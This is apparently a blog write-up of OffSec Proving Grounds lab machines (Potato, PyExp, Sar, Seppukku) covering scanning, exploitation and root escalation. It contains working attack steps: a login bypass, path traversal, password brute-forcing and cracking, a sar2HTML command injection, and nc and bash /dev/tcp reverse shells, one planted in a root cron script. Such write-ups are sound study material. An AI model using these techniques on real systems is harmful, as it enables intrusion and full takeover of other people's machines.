Post

OffSec PG - Potato, PyExp, Sar, Seppukku

Posted
PG Artwork
PG Artwork
By Tanishq Rupaal
8 min read

Potato

Enumeration

Machine IP → 192.168.53.101

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.53.101

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.41 ((Ubuntu))
2112FTPProFTPd

Web Scan

GoBuster scan → gobuster dir -u http://192.168.53.101 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • admin/
  • admin/index.php

Exploitation

Used ftp to login to the service running on port 2112, which allowed anonymous login.

The files available were index.php.bak and welcome.msg. The backup of the index page consists of the following code →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

<html>
<head></head>
<body>
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! <br> Go to the <a href="dashboard.php">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! <br> Return to the <a href="index.php">login page</a> <p>";
  }
  exit();
}
?>
  <form action="index.php?login=1" method="POST">
    <h1>Login</h1>
    <label><b>User:</b></label>
    <input type="text" name="username" required>
    <br>
    <label><b>Password:</b></label>
    <input type="password" name="password" required>
    <br>
    <input type="submit" id='submit' value='Login' >
  </form>
</body>
</html>

This gives an idea about how to bypass the login on /admin/index.php page. The strcmp($_POST['password'], $pass) == 0) check can be bypassed by changing the parameter password into password[] i.e., change it to an array compared to string. That would evaluate to true. Further, the username from the code shows that the required user is admin. Doing the check as stated by intercepting in Burp and changing parameters, a dashboard page at /admin/dashboard.php is made available.

The dashboard page has a Logs section that can retrieve logs from the system. This could have a directory traversal i.e., LFI vulnerability. Catching the request in burp and changing the log file to ../../../../../../../../etc/passwd gives the required users from the etc passwd file which have the bash login shell → root, florianges, webadmin.

The entry of interest is webadmin. The hash is available and seems insecure which can be cracked using John the Ripper. For this, the entry webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash is stored in a file test.pass and John is run as follows → john --wordlist=rockyou.txt test.pass. This revealed the output dragon which is the password for the webadmin user.

Used the password dragon for the user webadmin for ssh as follows → ssh webadmin@192.168.53.101. This gives the user flag located in the home directory for the user.

Privilege Escalation

Searched for setuid binaries with command → find / -perm -u=s -type f 2>/dev/null. Without a usable binary, checked allowed executions with sudo as follows → sudo -l. This gives the result that the user is allowed to run all commands under /bin/nice /notes/*.

The /notes/ directory contained scripts for executing clear and id commands. The * here is a wildcard and can thus be used to bypass the strict controls and use directory traversal technique to execute bash in the elevated state.

Therefore, executing the /bin/nice command as follows → sudo /bin/nice /notes/../bin/bash gives the root shell, followed by the root flag in the root home directory.

PyExp

Enumeration

Machine IP → 192.168.63.118

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.63.118

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
1337SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
3306MySQLMySQL 5.5.5-10.3.23-MariaDB-0+deb10u1 → *Salt: **“(APO{@jw7JP3MgBRU_

Exploitation

Mysql can be brute-forced for a password for the user root. Used hydra for this as follows → hyda -l root -P rockyou.txt -t 4 mysql://192.168.63.118. The password was prettywoman. With the new password, looking at mysql databases using the following → mysql -u root -h 192.168.63.118 -p.

Looking into the mysql shell, the database is data and the table is fernet. The table has the following entry →

cred → gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

keyy → UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

The given key and credentials are not any encoding format such as base64, etc. It is in fact fernet. The cryptography module in python has support for the fernet encryption. This can be decoded as follows using a python script →

1
2
3
4

from cryptography.fernet import Fernet
decryptor = Fernet(b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=')
plaintext = decryptor.decrypt(b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=')
print(plaintext)

Running this as python3 decrypt.py gives the output as b'lucy:wJ9“Lemdv9[FEw-‘. These can be used as the credentials for ssh running on port 1337. Logging in to ssh with the above credentials gives the user lucy` with a user flag in the home directory.

Privilege Escalation

For privilege escalation, searched set uid binaries using the following find command → find / -perm -u=s -type f 2>/dev/null. This does show sudo. Listing commands that can be run by user lucy by using sudo -l, the python2 binary can be called for the file /opt/exp.py.

The file contains the following code →

1
2

uinput = raw_input('how are you?')
exec(uinput)

exec() in python2 basically runs python inside it. Therefore, running the above with sudo /usr/bin/python2 /opt/exp.py and giving input as import os; os.system(“whoami“); returns root.

Therefore, a shell could even be spawned by changing the command, which gives the root flag in the /root/ directory.

Sar

Enumeration

Machine IP → 192.168.147.35

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.147.35

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Table

PortServiceOther details (if any)
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.147.35 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • robots.txt
  • phpinfo.php

Robots txt reveals a directory sar2HTML, which has an index.php page. The version for the sar2HTML is 3.2.1.

Exploitation

Google-fu reveals the existence of an RCE exploit for the sar2HTML version 3.2.1. For this exploit, /sar2HTML/index.php?plot=;whoami executes the command. The result can be seen on the webpage. Therefore, this was used to enumerate presence of bash, python and netcat. The /etc/passwd file was also printed which revealed the 2 users of importance to be root and love.

Thus, a reverse shell can be spawned using bash payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.147 3002 >/tmp/f for the user www-data.

The user flag was in the /home/ directory.

Privilege Escalation

Looking at setuid binaries, the most interesting ones are arping and ping. Looking at the crontab, there is a process that runs every 5 mins as the root user → cd /var/www/html/ && sudo ./finally.sh. Checking the code of the file, it seems that it runs another file called write.sh, which is world writable.

Therefore, using a reverse shell payload to get connection from the machine would execute it as root, thereby, giving a root shell.

This can be done via echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.147/3003 0>&1'" >> write.sh. This gives a shell in 5 minutes. Subsequently, it also gives the root flag.

Seppukku

Enumeration

Machine IP → 192.168.244.90

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.141.90

OS Detection → os_info

Table

PortServiceOther details (if any)
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPnginx 1.14.2
139NETBIOS-SSNSamba smbd 3.X - 4.X (workgroup: WORKGROUP)
445MICROSOFT-DSSamba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080SSL/EMPOWERIDLiteSpeed
7601HTTPApache httpd 2.4.38 ((Debian))
8088HTTPLiteSpeed httpd

Web Scan

GoBuster scan → /opt/gobuster dir -u http://192.168.141.90 -f -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • /index.html
  • /icons/
  • /b/
  • /a/
  • /c/
  • /t/
  • /r/
  • /d/
  • /e/
  • /f/
  • /h/
  • /w/
  • /q/
  • /database/
  • /production/
  • /keys/
  • /secret/

The directories /w/, secret and keys contain several interesting files →

  • ssh private keys within private and private.bak
  • hostname file with value seppuku
  • a wordlist password.lst
  • passwd.bak and shadow.bak

Exploitation

The wordlist can be used to brute force the ssh login by using hydra as follows →

1

hydra -l seppuku -P password.lst ssh://192.168.141.90

This gives the valid credentials as seppuku:eeyoree which can be used to login to the machine. This also gives the user flag within local.txt in the home directory.

Other items such as the backup for the password and shadow files were rabbit holes due to incorrectly formatted hashes.

Privilege Escalation

User

Listing the users in the /home directory gives other users as samurai and tanto. The ssh private keys discovered earlier grant access to user tanto via ssh. This leads us to a restricted shell. The sudo -l permissions for the user were to only create a symbolic link of the /root directory inside /tmp. However, this directory would still have the permissions of root which means those permissions are still needed to read the root flag.

The user directory also contains a .passwd file which contains a password. This password helps login with credentials samurai:12345685213456!@!@A for the next user. The sudo -l capability for this user is to run the following command →

1

/../../../../../../home/tanto/.cgi_bin/bin /tmp/*

This means that the command tries to execute the file /home/tanto/.cgi_bin/bin as a command and the /tmp/* as an argument.

Root

The command bin can be replaced with anything such that it will get executed. This can be done by using a shell script by the same name that can be created on the machine using nano as well as served via HTTP from attacker host to the tanto machine using wget. The file should contain the following →

1
2
3

##!/bin/bash

/bin/bash

This can then be made world executable by using chmod 777 bin and then moved inside the .cgi_bin directory. samurai can then use the command with sudo to execute this file which would then grant a root shell and thus the root flag.

Lab Practice Notes, OffSec Proving Grounds
oscp lab offsec-proving-grounds
This post is licensed under CC BY 4.0 by the author.